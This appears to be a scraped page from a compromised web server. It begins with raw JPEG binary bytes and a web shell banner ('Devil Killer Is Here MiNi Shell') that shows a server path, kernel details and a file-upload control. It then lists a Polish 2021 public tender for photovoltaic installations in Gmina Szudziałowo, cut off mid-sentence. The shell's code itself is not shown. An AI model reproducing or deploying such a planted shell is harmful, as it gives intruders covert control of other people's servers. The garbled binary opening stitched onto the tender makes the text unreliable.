JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010805601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00108056 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> 2. Dostawa i montaż instalacji fotowoltaicznych na potrzeby Gminy Szudziałowo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Szudziałowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659645</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bankowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szudziałowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857221404</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">857221441</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@szudzialowo-gmina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szudzialowo-gmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 2. Dostawa i montaż instalacji fotowoltaicznych na potrzeby Gminy Szudziałowo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-48198958-dfc0-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00108056</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001525/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Budowa instalacji fotowoltaicznych na potrzeby Gminy Szudziałowo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.ug.szudzialowo.wrotapodlaskia.pl https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortal który dostępny jest pod adresem: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oraz do komunikacji wynosi 150 MB Zgodnie ze wskazanymi informacjami w rozdziale 11 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z rozdziałem22 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 671018,44 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest: Dostawa wraz z montażem siedmiu instalacji fotowotaicznych na potrzeby Gminy Szudziałowo.<br/>4.2.	Przedmiot zamówienia obejmuje dostawę i montaż fabrycznie nowej infrastruktury, mającej na celu produkcję energii elektrycznej na potrzeby budynków użyteczności publicznej w gminie Szudziałowo, a w tym:<br/>1)	instalacji fotowoltaicznej na potrzeby budynku hydroforni w Babikach, w tym: projektowana moc instalacji 30 kW, <br/>2)	instalacji fotowoltaicznej na potrzeby budynku hydroforni w Szudziałowie, w tym: projektowana moc instalacji 30 kW. <br/>instalacji fotowoltaicznej na potrzeby budynku Szkoły Podstawowej w Szudziałowie Część A, w tym: projektowana moc instalacji 39,9 kW, Dach szkoły jest pokryty blachą trapezową.<br/>instalacji fotowoltaicznej na potrzeby budynku Szkoły Podstawowej w Szudziałowie część B, w tym: projektowana moc instalacji 25 kW. Dach szkoły jest pokryty blachą trapezową.<br/>instalacji fotowoltaicznej na potrzeby budynku Szkoły Podstawowej w Szudziałowie część C, w tym: projektowana moc instalacji 26,79 kW. Dach szkoły jest pokryty blachą trapezową.<br/>3)	instalacji fotowoltaicznej na potrzeby budynku oczyszczalni ścieków w Szudziałowie, w tym: projektowana moc instalacji 20,00 kW.<br/>4)	instalacji fotowoltaicznej na potrzeby budynku Wiejskiego Ośrodka Aktywności Lokalnej w Zubrzycy Wielkiej, w tym: projektowana moc instalacji 9,99 kW<br/>1.	Wraz z dostawą urządzeń na plac budowy, Zamawiający przewiduje możliwość żądania przedstawienia wyników badań modułów fotowoltaicznych w zakresie:<br/>1)	flash test,<br/>2)	wydajność modułów w standard test conditions (STC).<br/>2.	Zamawiający wymaga aby Wykonawca przeszkolił wskazane przez Zamawiającego osoby w zakresie obsługi instalacji, będącej przedmiotem zamówienia.<br/>3.	Szczegółowy zakres prac określony jest w Dokumentacji projektowej składającej się z :<br/>1)	Projektów koncepcyjnych instalacji fotowoltaicznej, odrębnych dla każdego budynku.<br/>2)	Przedmiarów robót, <br/>3)	Wymagania techniczne.<br/><br/>4.3.	Dodatkowe wymagania i informacje:<br/>1.	Zamawiający powoła Inspektora nadzoru inwestorskiego, którego upoważni do bezpośredniego monitorowania i nadzorowania realizacji robót w zakresie określonym dokumentacją projektową.<br/>2.	Wykonawca dla wypełnienia swoich zobowiązań powinien zapewnić doświadczone i wykwalifikowane osoby zdolne do prowadzenia wszelkich powierzonych zadań, uprawnione do kierowania robotami, zgodnie z obowiązującymi przepisami prawa i w zgodzie z postanowieniami odpowiednich decyzji, uzgodnieniami i opiniami, warunkującymi prawidłową realizację zamówienia.<br/>3.	Wykonawca dostarczy Inspektorowi nadzoru inwestorskiego wszelkie dokumenty, dotyczące Zamówienia, niezbędne do zgłoszenia zakończenia prac (dokumentacja powykonawcza, geodezyjna, protokoły z badań odbiorczych, atesty itp.). W ramach ustalonego wynagrodzenia, Wykonawca przekaże na rzecz Zamawiającego wszelkie prawa autorskie majątkowe do wykonanych opracowań i dokumentacji powykonawczej.<br/>4.	Dokumentacja powykonawcza będzie przekazana do akceptacji Inspektora w 1 egz. w wersji papierowej.<br/>5.	Wykonawca zobowiązuje się do:<br/>a)	poinformowania dystrybutora energii elektrycznej o planowanej ilości montażu nowych instalacji fotowoltaicznych oraz o planowanym terminie ich wykonania;<br/>b)	weryfikacji stanu instalacji elektrycznej obiektu oraz wykonania pomiarów rezystancji uziemienia i rezystancji izolacji wraz z dostarczeniem protokołów z wykonanych pomiarów;<br/>c)	modernizacji w niezbędnym zakresie istniejącej instalacji elektrycznej;<br/>d)	przyłączenia instalacji fotowoltaicznych do sieci elektroenergetycznej wraz z uzyskaniem w imieniu Użytkownika instalacji warunków przyłączenia oraz innych niezbędnych dokumentów formalno- prawnych;<br/>e)	przeprowadzenia w niezbędnym zakresie prób eksploatacyjnych i regulacji we współpracy z operatorem sieci energetycznej.<br/>f)	wyposażenia przedmiotowych elektrowni fotowoltaicznych we wszystkie zabezpieczenia zarówno po stronie DC jak i AC (w tym zabezpieczenia nadprądowe, przeciwpożarowe, przeciwporażeniowe, przepięciowe oraz instalację odgromową) zgodnie z obowiązującymi w czasie wykonywania instalacji przepisami oraz normami w tym zakresie. Instalacje elektryczne przedmiotowych elektrowni fotowoltaicznych muszą być wykonane zgodnie z zapisami ustawy Prawo budowlane oraz innych obowiązujących przepisów i norm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223810-7 - Konstrukcje gotowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na zabezpieczenie przeciw korozji wybudowanej konstrukcji wsporczej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na inwertery</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na panele fotowoltaiczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji grupy serwisowej na wypadek awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin Realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1. a) zdolności do występowania w obrocie gospodarczym –<br/>Zamawiający nie stawia szczegółowych wymagań w tym zakresie,<br/> b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający nie stawia szczegółowych wymagań w tym zakresie, <br/>c) sytuacji ekonomicznej lub finansowej Zamawiający nie stawia wymagań w tym zakresie<br/>d) zdolności technicznej lub zawodowej Zamawiający określa, że warunek zostanie spełniony, jeśli Wykonawca wykaże, że: -wykonał należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej<br/>trzech dostaw wraz z montażem instalacji fotowoltaicznej o mocy nie mniejszej niż 25 kW każda.<br/>UWAGA 2: Mając na uwadze art. 117 ust.1 PZP Zamawiający zastrzega, że w sytuacji składania oferty przez dwa lub więcej podmiotów (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 PZP, warunek o którym wyżej mowa musi zostać<br/>spełniony w całości przez Wykonawcę, jednego z Wykonawców wspólnie składającego ofertę lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca — Zamawiający nie dopuszcza możliwości tzw. sumowania doświadczenia.<br/>UWAGA 3: Wykonawca, który nabył doświadczenie będąc członkiem konsorcjum w uprzednio wykonanym zamówieniu, może posłużyć się nabytym doświadczeniem włącznie w przypadku, kiedy dane dostawy lub usługi<br/>wykonał osobiście- Skieruje do wykonania zamówienia, osoby posiadające określone poniżej uprawnienia i kwalifikacje:- jednego pracownika posiadającego aktualny certyfikat wydany przez Urząd Dozoru Technicznego potwierdzający kwalifikacje do instalowania odnawialnego źródła<br/>energii – systemów fotowoltaicznych oraz / lub uprawnienia w zakresie montażu źródeł energii<br/>na stanowisku eksploatacji, zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 28.04.2003 r. lub równoważny <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j.:<br/>Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z wzorem stanowiącym załącznik nr<br/>7 do SWZW przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z<br/>oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie<br/>prowadzą do zakłócenia konkurencji w postępowaniu.8.6. Wykonawca składa podmiotowe środki<br/>dowodowe na wezwanie Zamawiającego. Dokumenty te powinny być aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu:a) wykazu dostaw lub usług, wykonanych w okresie ostatnich 3 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, daty wykonania oraz podmiotów, na rzecz których dostawy lub<br/>usługi zostały wykonane (sporządzonego zgodnie z zał. Nr 4 do SWZ), wraz z załączeniem dowodów<br/>określających, czy te dostawy lub usługi zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub<br/>usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie<br/>uzyskać tych dokumentów – oświadczenie wykonawcy – w odniesieniu do warunku określonego w pkt.<br/>6.1.4.1 SWZ,,b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia, publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacją na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami (sporządzonego zgodnie z zał. Nr 3 do SWZ) – w odniesieniu do warunku<br/>określonego w pkt 6.1.4.2 SWZUWAGA:Jeżeli wykonawca powołuje się na doświadczenie w realizacji<br/>dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami lub polega na zasobach innego<br/>podmiotu, wykaz o którym mowa w 8.3.1.a dotyczy dostaw lub usług, w których wykonaniu jeden<br/>wykonawca bezpośrednio uczestniczył – brak możliwości sumowania doświadczenia8.6. Wykonawca<br/>składa podmiotowe środki dowodowe na wezwanie Zamawiającego. Dokumenty te powinny być aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wraz z dostawą urządzeń na plac budowy, Zamawiający przewiduje możliwość żądania przedstawienia wyników badań modułów fotowoltaicznych w zakresie:1) flash test,2) wydajność modułów w standard test conditions (STC).<br/>Zamawiający wymaga przedmiotowych środków<br/>dowodowych:<br/>1. karty katalogowe materiałów wykorzystywanych do budowy przedmiotowych<br/>instalacji elektrycznych (panele fotowoltaiczne, okablowanie, falowniki). Dokument winien być przekazany w oryginale w postaci dokumenty<br/>elektronicznego lub elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem.<br/>2. dokumenty potwierdzające okresy gwarancji producenta konstrukcji wsporczych, paneli fotowoltaicznych i inwerterów. Dokument winien być przekazany w oryginale w postaci dokumenty elektronicznego lub elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. karty katalogowe materiałów wykorzystywanych do budowy przedmiotowych instalacji elektrycznych. Dokument winien być przekazany w oryginale w postaci dokumenty elektronicznego lub elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem.<br/>2. dokumenty potwierdzające okresy gwarancji producenta konstrukcji wsporczych, paneli. Dokument winien być przekazany w oryginale w postaci dokumenty elektronicznego lub elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:1) Formularz ofertowy –<br/>zgodnie ze wzorem stanowiącym Załącznik nr 1 do SWZ,2) Oświadczenie, o którym mowa w<br/>rozdziale 8.1 SWZ – załącznik nr 2 do SWZ;3) Zobowiązanie lub inne dokumenty, o których<br/>mowa w pkt 9.4 SWZ (jeżeli dotyczy).4) Potwierdzenie umocowania do działania w imieniu<br/>Wykonawcy lub podmiotu udostępniającego zasoby:a) Zamawiający w celu potwierdzenia, że<br/>osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby jest umocowana<br/>do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru;b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za 